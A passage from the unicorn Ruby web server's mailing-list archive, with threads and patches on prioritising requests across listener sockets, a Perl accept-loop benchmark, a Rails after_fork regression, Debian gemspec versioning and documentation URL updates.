> > The idea is to classify the request at nginx level (by vhost, http
> > path, header or whatever), and send the queries to two different
> > unicorn sockets (opened by the same unicorn instance): one for high
> > priority request, one for low priority request.
> > I need to do some small modifications [1] in the unicorn worker loop
> > to process high priority requests first. It seems to work:
> > - I launch a first apache bench toward the low priority port
> > - I launch a second apache bench toward the high priority port
> > - Unicorn handles only the queries for that one, and stops answering
> > the low priority traffic
>
> > [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
>
> Easier to view locally w/o JS/CSS using "git show -W" for context:
>
> $ git remote add bpaquet https://github.com/bpaquet/unicorn
> $ git fetch bpaquet
> $ git show -W 58d6ba28
>   <snip>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 5334fa0c..976b728e 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
>    # runs inside each forked worker, this sits around and waits
>    # for connections and doesn't die until the parent dies (or is
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = @master_pid
>      readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
>
>      # this only works immediately if the master sent us the signal
>      # (which is the normal case)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    high_priority_reader = readers.first
> +    last_processed_is_high_priority = false
>      @after_worker_ready.call(self, worker)
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
>        worker.tick = time_now.to_i
>        tmp = ready.dup
>        while sock = tmp.shift
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> +          last_processed_is_high_priority = sock == high_priority_reader
>            process_client(client)
>            nr += 1
>            worker.tick = time_now.to_i
>          end
> -        break if nr < 0
> +        break if nr < 0 || last_processed_is_high_priority
>        end
>
>        # make the following bet: if we accepted clients this round,
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      unless nr == 0 || !last_processed_is_high_priority
>          tmp = ready.dup
>          redo
>        end
>
>        ppid == Process.ppid or return
>
>        # timeout used so we can detect parent death:
>        worker.tick = time_now.to_i
>        ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
>        redo if nr < 0 && readers[0]
>        Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
>      end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
>    # is no longer running.
>
> > The tradeoffs are
> > - No more "bet"[2] on low priority traffic. This probably slows down
> > the low priority traffic a little bit.
>
> Yeah, but low priority is low priority, so it's fine to slow
> them down, right? :>
>
> > - This approach is only low / high. Not sure if I can extend it to 3
> > (or more) levels of priority without a non-negligible performance
> > impact (because of the "bet" above).
>
> I don't think it makes sense to have more than two levels of
> priority (zero, one, two, infinity rule?)
> <https://en.wikipedia.org/wiki/Zero_One_Infinity>
>
> > Do you think this approach is correct?
>
> readers order isn't guaranteed, especially when inheriting
> sockets from systemd or similar launchers.

Interesting point.

>
> I think some sort order could be defined via listen option...
>
> I'm not sure if inheriting multiple sockets from systemd or
> similar launchers using LISTEN_FDS env can guarantee ordering
> (or IO.select in Ruby, for that matter).
>
> It seems OK otherwise, I think...  Have you tested in real world?

Not yet. But I will probably test it soon.

>
> > Do you have any better idea to have some traffic prioritization?
> > (Another idea is to have dedicated workers for each priority class.
> > This approach has other downsides, I would like to avoid it).
> > Is it something we can  introduce in Unicorn (not as default
> > behaviour, but as a configuration option)?
>
> If you're willing to drop some low-priority requests, using a
> small listen :backlog value for a low-priority listen may work.
>
> I'm hesitant to put extra code in worker_loop method since
> it can slow down current users who don't need the feature.
>
> Instead, perhaps try replacing the worker_loop method entirely
> (similar to how oob_gc.rb wraps process_client) so users who
> don't enable the feature won't be penalized with extra code.
> Users who opt into the feature can get an entirely different
> method.

Ok I will try this approach. I'm a little bit annoyed by the code duplication.

>
> > Thx for any opinion.
>
> The best option would be to never get yourself into a situation
> where you're overloaded, by making everything fast :>
> Anything else seems pretty ugly...

On a system which handles 10k QPS, it's really difficult to never have
an issue somewhere :)

Thx

Bertrand

^ permalink raw reply	[relevance 0%]

* Re: Traffic priority with Unicorn
  2019-12-16 22:34  2% Traffic priority with Unicorn Bertrand Paquet
@ 2019-12-17  5:12  0% ` Eric Wong
  2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-12-17  5:12 UTC (permalink / raw)
  To: Bertrand Paquet; +Cc: unicorn-public

Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> Hello,
> 
> I would like to introduce some traffic priority in Unicorn. The goal
> is to keep critical endpoints online even if the application is
> slowing down a lot.
> 
> The idea is to classify the request at nginx level (by vhost, http
> path, header or whatever), and send the queries to two different
> unicorn sockets (opened by the same unicorn instance): one for high
> priority request, one for low priority request.
> I need to do some small modifications [1] in the unicorn worker loop
> to process high priority requests first. It seems to work:
> - I launch a first apache bench toward the low priority port
> - I launch a second apache bench toward the high priority port
> - Unicorn handles only the queries for that one, and stops answering
> the low priority traffic

> [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#

Easier to view locally w/o JS/CSS using "git show -W" for context:

$ git remote add bpaquet https://github.com/bpaquet/unicorn
$ git fetch bpaquet
$ git show -W 58d6ba28
  <snip>
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0c..976b728e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = @master_pid
     readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
 
     # this only works immediately if the master sent us the signal
     # (which is the normal case)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    high_priority_reader = readers.first
+    last_processed_is_high_priority = false
     @after_worker_ready.call(self, worker)
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
       worker.tick = time_now.to_i
       tmp = ready.dup
       while sock = tmp.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
+          last_processed_is_high_priority = sock == high_priority_reader
           process_client(client)
           nr += 1
           worker.tick = time_now.to_i
         end
-        break if nr < 0
+        break if nr < 0 || last_processed_is_high_priority
       end
 
       # make the following bet: if we accepted clients this round,
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      unless nr == 0 || !last_processed_is_high_priority
         tmp = ready.dup
         redo
       end
 
       ppid == Process.ppid or return
 
       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
   # is no longer running.

> The tradeoffs are
> - No more "bet"[2] on low priority traffic. This probably slows down
> the low priority traffic a little bit.

Yeah, but low priority is low priority, so it's fine to slow
them down, right? :>

> - This approach is only low / high. Not sure if I can extend it to 3
> (or more) levels of priority without a non-negligible performance
> impact (because of the "bet" above).

I don't think it makes sense to have more than two levels of
priority (zero, one, two, infinity rule?)
<https://en.wikipedia.org/wiki/Zero_One_Infinity>

> Do you think this approach is correct?

readers order isn't guaranteed, especially when inheriting
sockets from systemd or similar launchers.

I think some sort order could be defined via listen option...

I'm not sure if inheriting multiple sockets from systemd or
similar launchers using LISTEN_FDS env can guarantee ordering
(or IO.select in Ruby, for that matter).

It seems OK otherwise, I think...  Have you tested in real world?

> Do you have any better idea to have some traffic prioritization?
> (Another idea is to have dedicated workers for each priority class.
> This approach has other downsides, I would like to avoid it).
> Is it something we can  introduce in Unicorn (not as default
> behaviour, but as a configuration option)?

If you're willing to drop some low-priority requests, using a
small listen :backlog value for a low-priority listen may work.
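
Something like this in the config, as a rough sketch (paths and
numbers are arbitrary), so the kernel sheds excess low-priority
connections while the high-priority listener keeps a deep queue:

    listen "/run/unicorn/high.sock", backlog: 1024
    listen "/run/unicorn/low.sock",  backlog: 5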

I'm hesitant to put extra code in worker_loop method since
it can slow down current users who don't need the feature.

Instead, perhaps try replacing the worker_loop method entirely
(similar to how oob_gc.rb wraps process_client) so users who
don't enable the feature won't be penalized with extra code.
Users who opt into the feature can get an entirely different
method.
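
Roughly this shape, as a structural sketch of the opt-in mechanism
only (the module and file names are made up, and the replacement
loop body itself is elided):

    # lib/unicorn/prio_accept.rb -- hypothetical opt-in module
    module Unicorn::PrioAccept  # assumes unicorn is already loaded
      def self.enable!
        # extend running server instances, like oob_gc.rb does for
        # process_client, so the stock worker_loop stays untouched
        ObjectSpace.each_object(Unicorn::HttpServer) { |s| s.extend(self) }
      end

      def worker_loop(worker)
        # ... a copy of HttpServer#worker_loop, modified to accept on
        # the high-priority listener before the low-priority one ...
      end
    end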

> Thx for any opinion.

The best option would be to never get yourself into a situation
where you're overloaded, by making everything fast :>
Anything else seems pretty ugly...

^ permalink raw reply related	[relevance 0%]

* Traffic priority with Unicorn
@ 2019-12-16 22:34  2% Bertrand Paquet
  2019-12-17  5:12  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bertrand Paquet @ 2019-12-16 22:34 UTC (permalink / raw)
  To: unicorn-public

Hello,

I would like to introduce some traffic priority in Unicorn. The goal
is to keep critical endpoints online even if the application is
slowing down a lot.

The idea is to classify the request at nginx level (by vhost, http
path, header or whatever), and send the queries to two different
unicorn sockets (opened by the same unicorn instance): one for high
priority request, one for low priority request.
I need to do some small modifications [1] in the unicorn worker loop
to process high priority requests first. It seems to work:
- I launch a first apache bench toward the low priority port
- I launch a second apache bench toward the high priority port
- Unicorn handles only the queries for that one, and stops answering
the low priority traffic

The tradeoffs are
- No more "bet"[2] on low priority traffic. This probably slows down
the low priority traffic a little bit.
- This approach is only low / high. Not sure if I can extend it to 3
(or more) levels of priority without a non-negligible performance
impact (because of the "bet" above).

Do you think this approach is correct?
Do you have any better idea to have some traffic prioritization?
(Another idea is to have dedicated workers for each priority class.
This approach has other downsides, I would like to avoid it).
Is it something we can  introduce in Unicorn (not as default
behaviour, but as a configuration option)?

Thx for any opinion.

Bertrand

[1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
[2] https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb#n707

^ permalink raw reply	[relevance 2%]

* [PATCH 3/3] test/benchmark/uconnect: test for accept loop speed
  @ 2019-05-12 22:25  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-12 22:25 UTC (permalink / raw)
  To: unicorn-public

In preparation for kgio removal, I want to ensure we can
maintain existing performance when swapping kgio_tryaccept
for accept_nonblock on Ruby 2.3+

There's plenty of TCP benchmarking tools, but TCP port reuse
delays hurt predictability since unicorn doesn't do persistent
connections.

So this is exclusively for Unix sockets and uses Perl instead
of Ruby since I don't want to be bothered with GC
unpredictability on the client side.
---
 test/benchmark/uconnect.perl | 66 ++++++++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100755 test/benchmark/uconnect.perl

diff --git a/test/benchmark/uconnect.perl b/test/benchmark/uconnect.perl
new file mode 100755
index 0000000..230445e
--- /dev/null
+++ b/test/benchmark/uconnect.perl
@@ -0,0 +1,66 @@
+#!/usr/bin/perl -w
+# Benchmark script to spawn some processes and hammer a local unicorn
+# to test accept loop performance.  This only does Unix sockets.
+# There's plenty of TCP benchmarking tools out there, and TCP port reuse
+# has predictability problems since unicorn can't do persistent connections.
+# Written in Perl for the same reason: predictability.
+# Ruby GC is not as predictable as Perl refcounting.
+use strict;
+use Socket qw(AF_UNIX SOCK_STREAM sockaddr_un);
+use POSIX qw(:sys_wait_h);
+use Getopt::Std;
+# -c / -n switches stolen from ab(1)
+my $usage = "$0 [-c CONCURRENCY] [-n NUM_REQUESTS] SOCKET_PATH\n";
+our $opt_c = 2;
+our $opt_n = 1000;
+getopts('c:n:') or die $usage;
+my $unix_path = shift or die $usage;
+use constant REQ => "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n";
+use constant REQ_LEN => length(REQ);
+use constant BUFSIZ => 8192;
+$^F = 99; # don't waste syscall time with FD_CLOEXEC
+
+my %workers; # pid => worker num
+die "-n $opt_n not evenly divisible by -c $opt_c\n" if $opt_n % $opt_c;
+my $n_per_worker = $opt_n / $opt_c;
+my $addr = sockaddr_un($unix_path);
+
+for my $num (1..$opt_c) {
+	defined(my $pid = fork) or die "fork failed: $!\n";
+	if ($pid) {
+		$workers{$pid} = $num;
+	} else {
+		work($n_per_worker);
+	}
+}
+
+reap_worker(0) while scalar keys %workers;
+exit;
+
+sub work {
+	my ($n) = @_;
+	my ($buf, $x);
+	for (1..$n) {
+		socket(S, AF_UNIX, SOCK_STREAM, 0) or die "socket: $!";
+		connect(S, $addr) or die "connect: $!";
+		defined($x = syswrite(S, REQ)) or die "write: $!";
+		$x == REQ_LEN or die "short write: $x != ".REQ_LEN."\n";
+		do {
+			$x = sysread(S, $buf, BUFSIZ);
+			unless (defined $x) {
+				next if $!{EINTR};
+				die "sysread: $!\n";
+			}
+		} until ($x == 0);
+	}
+	exit 0;
+}
+
+sub reap_worker {
+	my ($flags) = @_;
+	my $pid = waitpid(-1, $flags);
+	return if !defined $pid || $pid <= 0;
+	my $p = delete $workers{$pid} || '(unknown)';
+	warn("$pid [$p] exited with $?\n") if $?;
+	$p;
+}
-- 
EW


^ permalink raw reply related	[relevance 5%]

* Re: Issues after 5.5.0 upgrade
  @ 2019-03-06  5:57  2%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2019-03-06  5:57 UTC (permalink / raw)
  To: Eric Wong; +Cc: Stan Pitucha, unicorn-public

On 03/06 04:44, Eric Wong wrote:
> Stan Pitucha <stan.pitucha@envato.com> wrote:
> > > I only saw one issue (proposed fix below).
> > Sorry, I solved the other one while writing the email but forgot to
> > update the intro.
> >
> > So the fix worked for the issue I mentioned, thanks! Also, running
> > unicorn directly works just fine now.
> 
> You're welcome and thanks for following up!
> 
> > I ran into another regression with unicorn_rails though. We're doing
> > some work in `after_fork` which relies on a class found in
> > `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> > changed and now I get workers respawning in a loop:
> > 
> > E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> > constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> > (NameError)
> 
> Is this with `preload_app true`?  I'm not too up-to-date
> with scoping and namespace behavior stuff, actually.

This is just a guess, but we probably want to call the Unicorn.builder
lambda with the same arguments as the rails_builder lambda.

diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index ea4f822..354c1df 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -132,11 +132,11 @@ def rails_builder(ru, op, daemonize)
 
   # this lambda won't run until after forking if preload_app is false
   # this runs after config file reloading
-  lambda do ||
+  lambda do |x, server|
     # Rails 3 includes a config.ru, use it if we find it after
     # working_directory is bound.
     ::File.exist?('config.ru') and
-      return Unicorn.builder('config.ru', op).call
+      return Unicorn.builder('config.ru', op).call(x, server)
 
     # Load Rails and (possibly) the private version of Rack it bundles.
     begin

If that doesn't fix it, keep reading.

If after_fork is referencing LoggerSwitcher, and preload_app is not set,
then I think the failure should be expected, as in that case after_fork
is called before build_app!.  That would not explain a regression,
though, as that behavior should have been true in 5.4.1.

Does the problem go away if you switch after_fork to after_worker_ready?
Is preload_app set to true?
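
For illustration, a minimal config sketch of the two things asked
about above (LoggerSwitcher is the class from lib/ mentioned earlier;
its switch! call here is hypothetical):

    # either build the app before forking so its constants are loaded:
    preload_app true

    # or defer the work until after build_app! has run in the worker:
    after_worker_ready do |server, worker|
      LoggerSwitcher.switch!(worker.nr) # hypothetical app-level call
    end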

Thanks,
Jeremy

^ permalink raw reply related	[relevance 2%]

* Re: Bug#918916: Unicorn not reporting proper version for gemfile?
  2019-01-12  9:42  3%     ` Hleb Valoshka
@ 2019-01-12 10:04  0%       ` Dominik George
  0 siblings, 0 replies; 200+ results
From: Dominik George @ 2019-01-12 10:04 UTC (permalink / raw)
  To: Hleb Valoshka, 918916; +Cc: Justin Hallett, unicorn-public

>I've checked debian's git, this patch was introduced when
>ENV["VERSION"] was required to use the gemspec. Now as the upstream
>gemspec provides the same it's not required.
>
>The problem is not in Unicorn. The problem is in gem2deb which
>generated incorrect unicorn-0.gemspec for the package.

OK... But, why was it fixed when I rebuilt with the patch?

-nik

^ permalink raw reply	[relevance 0%]

* Re: Bug#918916: Unicorn not reporting proper version for gemfile?
  @ 2019-01-12  9:42  3%     ` Hleb Valoshka
  2019-01-12 10:04  0%       ` Dominik George
  0 siblings, 1 reply; 200+ results
From: Hleb Valoshka @ 2019-01-12  9:42 UTC (permalink / raw)
  To: 918916; +Cc: Dominik George, Justin Hallett, unicorn-public

On 1/10/19, Eric Wong <e@80x24.org> wrote:
>> +-  s.version = (ENV['VERSION'] || '5.4.1').dup
>> ++  s.version = '5.4.1'
>
> Why is ignoring ENV['VERSION'] necessary for the Debian build?
> I can probably remove that check if desired from the upstream
> package before the 5.5.0 release.

I've checked Debian's git; this patch was introduced when
ENV["VERSION"] was required to use the gemspec. Now that the upstream
gemspec provides the same, it's not required.

The problem is not in Unicorn. The problem is in gem2deb which
generated incorrect unicorn-0.gemspec for the package.

^ permalink raw reply	[relevance 3%]

* [PATCH] doc/ISSUES: add links to git clone-able mail archives of our dependencies
@ 2018-12-13  1:07  6% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-12-13  1:07 UTC (permalink / raw)
  To: unicorn-public

Archives are crucial to preserving history and knowledge in Free
Software projects, so promote them for projects we depend on.

Naq lrf, gur nepuviny fbsgjner qrirybcrq sbe nepuvivat gur
havpbea znvyvat yvfg unf ybat fhecnffrq gur hfrshyarff bs
havpbea vgfrys :C
---
 ISSUES | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/ISSUES b/ISSUES
index 610f011..c04ff54 100644
--- a/ISSUES
+++ b/ISSUES
@@ -39,6 +39,7 @@ https://bugs.ruby-lang.org/ and discuss+fix them on the ruby-core
 list at mailto:ruby-core@ruby-lang.org
 Subscription to post is required to ruby-core, unfortunately:
 mailto:ruby-core-request@ruby-lang.org?subject=subscribe
+Unofficial archives are available at: https://public-inbox.org/ruby-core/
 
 For uncommon bugs in Rack, we may forward bugs to
 mailto:rack-devel@googlegroups.com and discuss there.
@@ -46,6 +47,7 @@ Subscription (without any web UI or Google account) is possible via:
 mailto:rack-devel+subscribe@googlegroups.com
 Note: not everyone can use the proprietary bug tracker used by Rack,
 but their mailing list remains operational.
+Unofficial archives are available at: https://public-inbox.org/rack-devel/
 
 Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
 Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
@@ -54,11 +56,12 @@ and subsystem maintainers such as mailto:netdev@vger.kernel.org
 involved with any problematic commits (including those in the
 Signed-off-by: and other trailer lines).  No subscription is necessary,
 and the our mailing list follows the same conventions as LKML for
-interopability.  There is a kernel.org Bugzilla instance, but it is
-ignored by most developers.
+interopability. Archives are available at https://lore.kernel.org/lkml/
+There is a kernel.org Bugzilla instance, but it is ignored by most.
 
 Likewise for any rare glibc bugs we might encounter, we should Cc:
 mailto:libc-alpha@sourceware.org
+Unofficial archives are available at: https://public-inbox.org/libc-alpha/
 Keep in mind glibc upstream does use Bugzilla for tracking bugs:
 https://sourceware.org/bugzilla/
 

^ permalink raw reply related	[relevance 6%]

* [PATCH] doc: update more URLs to use HTTPS and avoid redirects
@ 2018-11-07 23:38  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-11-07 23:38 UTC (permalink / raw)
  To: unicorn-public

Latency from redirects is painful, and HTTPS can protect privacy
in some cases.
---
 .olddoc.yml                       |  2 +-
 Application_Timeouts              |  8 ++++----
 Documentation/unicorn.1.txt       |  2 +-
 Documentation/unicorn_rails.1.txt |  2 +-
 LICENSE                           |  4 ++--
 Links                             | 12 ++++++------
 README                            |  8 ++++----
 Sandbox                           |  4 ++--
 examples/logrotate.conf           |  2 +-
 examples/nginx.conf               |  5 +++--
 lib/unicorn/configurator.rb       |  2 +-
 lib/unicorn/http_request.rb       |  2 +-
 lib/unicorn/http_server.rb        |  2 +-
 lib/unicorn/util.rb               |  2 +-
 t/README                          |  8 ++++----
 15 files changed, 33 insertions(+), 32 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index cacc0ab..d2d340f 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,6 +1,6 @@
 ---
 cgit_url: https://bogomips.org/unicorn.git
-git_url: git://bogomips.org/unicorn.git
+git_url: https://bogomips.org/unicorn.git
 rdoc_url: https://bogomips.org/unicorn/
 ml_url: https://bogomips.org/unicorn-public/
 merge_html:
diff --git a/Application_Timeouts b/Application_Timeouts
index 561a1cc..4dcd954 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -23,10 +23,10 @@ Most database adapters allow configurable timeouts.
 Net::HTTP and Net::SMTP in the Ruby standard library allow
 configurable timeouts.
 
-Even for things as fast as {memcached}[http://memcached.org/],
-{dalli}[http://rubygems.org/gems/dalli],
-{memcached}[http://rubygems.org/gems/memcached] and
-{memcache-client}[http://rubygems.org/gems/memcache-client] RubyGems all
+Even for things as fast as {memcached}[https://memcached.org/],
+{dalli}[https://rubygems.org/gems/dalli],
+{memcached}[https://rubygems.org/gems/memcached] and
+{memcache-client}[https://rubygems.org/gems/memcache-client] RubyGems all
 offer configurable timeouts.
 
 Consult the relevant documentation for the libraries you use on
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index e692078..da7281d 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -182,6 +182,6 @@ the unicorn config file.
 * [Rackup HowTo][3]
 
 [1]: https://bogomips.org/unicorn/
-[2]: http://www.rubydoc.info/github/rack/rack/
+[2]: https://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
 [4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index 088e2ff..fb0e60f 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -170,6 +170,6 @@ used by Unicorn.
 * [Rackup HowTo][3]
 
 [1]: https://bogomips.org/unicorn/
-[2]: http://www.rubydoc.info/github/rack/rack/
+[2]: https://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
 [4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/LICENSE b/LICENSE
index 5b6458e..e986865 100644
--- a/LICENSE
+++ b/LICENSE
@@ -8,8 +8,8 @@ any later version.  We currently prefer the GPLv3 or later for
 derivative works, but the GPLv2 is fine.
 
 The complete texts of the GPLv2 and GPLv3 are below:
-GPLv2 - http://www.gnu.org/licenses/gpl-2.0.txt
-GPLv3 - http://www.gnu.org/licenses/gpl-3.0.txt
+GPLv2 - https://www.gnu.org/licenses/gpl-2.0.txt
+GPLv3 - https://www.gnu.org/licenses/gpl-3.0.txt
 
 You may (against our _preference_) also use the Ruby 1.8 license terms
 which we inherited from the original Mongrel project when we forked it:
diff --git a/Links b/Links
index 475a6c0..baba9c7 100644
--- a/Links
+++ b/Links
@@ -10,7 +10,7 @@ The unicorn project is not responsible for the content in these links.
 Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
-* any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
+* any non-{Free Software}[https://www.gnu.org/philosophy/free-sw.html]
 
 The existence of these links does not imply endorsement of any entities
 or services behind them.
@@ -31,25 +31,25 @@ or services behind them.
 
 === unicorn is written to work with
 
-* {Rack}[http://rack.github.io/] - a minimal interface between webservers
+* {Rack}[https://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
   Rack and unicorn
 
-* {nginx}[http://nginx.org/] (Free versions) -
+* {nginx}[https://nginx.org/] (Free versions) -
   the reverse proxy for use with unicorn
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
+* {Green Unicorn}[https://gunicorn.org/] - a Python version of unicorn
 
-* {Starman}[http://search.cpan.org/dist/Starman/] - Plack/PSGI version
+* {Starman}[https://metacpan.org/release/Starman/] - Plack/PSGI version
   of unicorn
 
 === Prior Work
 
-* {Mongrel}[http://rubygems.org/gems/mongrel] - the awesome webserver
+* {Mongrel}[https://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on
 
 * {david}[https://bogomips.org/david.git] - a tool to explain why you need
diff --git a/README b/README
index 29e04b4..5e5ccf7 100644
--- a/README
+++ b/README
@@ -10,7 +10,7 @@ both the the request and response in between unicorn and slow clients.
 
 * Designed for Rack, Unix, fast clients, and ease-of-debugging.  We
   cut out everything that is better supported by the operating system,
-  {nginx}[http://nginx.org/] or {Rack}[http://rack.github.io/].
+  {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.x remains supported for Ruby 1.8 users.
@@ -77,13 +77,13 @@ You may install it via RubyGems on RubyGems.org:
 You can get the latest source via git from the following locations
 (these versions may not be stable):
 
-  git://bogomips.org/unicorn.git
-  git://repo.or.cz/unicorn.git (mirror)
+  https://bogomips.org/unicorn.git
+  https://repo.or.cz/unicorn.git (mirror)
 
 You may browse the code from the web:
 
 * https://bogomips.org/unicorn.git
-* http://repo.or.cz/w/unicorn.git (gitweb)
+* https://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
 from git.
diff --git a/Sandbox b/Sandbox
index e10b36d..d0f915e 100644
--- a/Sandbox
+++ b/Sandbox
@@ -3,7 +3,7 @@
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
 RubyGems installations such as
-{Bundler}[http://bundler.io/] or
+{Bundler}[https://bundler.io/] or
 {Isolate}[https://github.com/jbarnette/isolate].
 
 == General deployment
@@ -66,7 +66,7 @@ before_exec hook as illustrated by https://gist.github.com/534668
 Ruby 2.0.0 enforces FD_CLOEXEC on file descriptors by default.  unicorn
 has been prepared for this behavior since unicorn 4.1.0, and bundler
 needs the "--keep-file-descriptors" option for "bundle exec":
-http://bundler.io/man/bundle-exec.1.html
+https://bundler.io/man/bundle-exec.1.html
 
 == Isolate
 
diff --git a/examples/logrotate.conf b/examples/logrotate.conf
index 437f6c6..77a01b5 100644
--- a/examples/logrotate.conf
+++ b/examples/logrotate.conf
@@ -2,7 +2,7 @@
 # /etc/logrotate.d/unicorn_app on my Debian systems
 #
 # See the logrotate(8) manpage for more information:
-#    http://linux.die.net/man/8/logrotate
+#    https://linux.die.net/man/8/logrotate
 #
 # public logrotate-related discussion in our archives:
 #    https://bogomips.org/unicorn-public/?q=logrotate
diff --git a/examples/nginx.conf b/examples/nginx.conf
index e25712f..b6b69c1 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -56,7 +56,8 @@ http {
   # to configure it all in one place here for static files and also
   # to disable gzip for clients who don't get gzip/deflate right.
   # There are other gzip settings that may be needed used to deal with
-  # bad clients out there, see http://wiki.nginx.org/NginxHttpGzipModule
+  # bad clients out there, see
+  # https://nginx.org/en/docs/http/ngx_http_gzip_module.html
   gzip on;
   gzip_http_version 1.0;
   gzip_proxied any;
@@ -117,7 +118,7 @@ http {
 
     location @app {
       # an HTTP header important enough to have its own Wikipedia entry:
-      #   http://en.wikipedia.org/wiki/X-Forwarded-For
+      #   https://en.wikipedia.org/wiki/X-Forwarded-For
       proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 
       # enable this if you forward HTTPS traffic to unicorn,
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index d426edf..e8b76f5 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -238,7 +238,7 @@ def before_exec(*args, &block)
   #      server 192.168.0.9:8080 fail_timeout=0;
   #    }
   #
-  # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
+  # See https://nginx.org/en/docs/http/ngx_http_upstream_module.html
   # for more details on nginx upstream configuration.
   def timeout(seconds)
     set_int(:timeout, seconds, 3)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bb884b..bcc1f2d 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -65,7 +65,7 @@ def read(socket)
     clear
     e = env
 
-    # From http://www.ietf.org/rfc/rfc3875:
+    # From https://www.ietf.org/rfc/rfc3875:
     # "Script authors should be aware that the REMOTE_ADDR and
     #  REMOTE_HOST meta-variables (see sections 4.1.8 and 4.1.9)
     #  may not identify the ultimate source of the request.  They
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 62f6171..5334fa0 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -84,7 +84,7 @@ def initialize(app, options = {})
